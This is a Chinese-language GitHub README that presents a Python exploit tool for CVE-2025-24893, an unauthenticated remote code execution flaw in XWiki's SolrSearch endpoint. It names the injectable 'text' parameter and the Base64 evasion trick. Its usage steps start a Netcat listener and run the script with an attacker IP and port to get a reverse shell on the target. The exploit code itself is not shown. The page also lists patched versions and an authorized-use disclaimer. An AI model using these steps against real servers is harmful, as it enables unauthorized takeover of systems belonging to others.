hasecto/CVE-2025-24893
GitHub: hasecto/CVE-2025-24893
针对 XWiki 平台 CVE-2025-24893 未经身份验证远程代码执行漏洞的自动化 exploit 工具。
Stars: 0 | Forks: 0
# CVE-2025-24893
XWiki 远程代码执行 (RCE) Exploit
这是一个用于 **CVE-2025-24893** 的 Python3 exploit,该漏洞是影响 **XWiki** 平台的一个严重的未经身份验证的远程代码执行 (RCE) 漏洞。
该脚本利用了 `SolrSearch` macro 组件中的代码/表达式注入 (CWE-95) 漏洞。该漏洞允许攻击者在底层操作系统上执行任意的 Groovy/Java 代码。该 exploit 会自动进行 Base64 编码,以规避 Java 的 `Runtime.getRuntime().exec()` 函数在解析命令时的限制。
## 📊 漏洞详情
- **CVE ID:** CVE-2025-24893
- **CVSS 评分:** 9.8 严重 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- **CWE:** CWE-95 (表达式语言表达式的不正确中和 / Eval 注入)
- **目标组件:** `/bin/get/Main/SolrSearch` (通过 `text` 参数)
## 🔍 受影响版本
- 从 **5.3-milestone-2** 到 **15.10.10** 的所有版本
- 从 **16.0.0-rc-1** 到 **16.4.0** 的版本
## 🚀 使用方法
### 1. 在 Kali Linux 上启动你的监听器 (Netcat):
```
nc -lvnp 4444
```
### 2. 执行 exploit:
```
python3 CVE-2025-24-893.py
```
**示例:**
```
python3 CVE-2025-24-893.py http://domain.local 10.10.14.229 4444
```
## 🛠️ 前置条件
- Python 3.x
- `requests` 库
安装所需的依赖项:
```
pip install requests
```
## 🛡️ 修复方案
将你的 XWiki 实例更新至以下任一官方修复版本:**15.10.11**、**16.4.1**、**16.5.0-rc-1** (或更高版本)。
## ⚠️ 免责声明
此脚本仅供教育目的、授权的安全审计和渗透测试 (Pentest) 使用。作者不对因使用此工具而导致的任何滥用、损害或非法活动负责。未经事先授权将此脚本用于攻击目标是严格违法的。
标签:逆向工具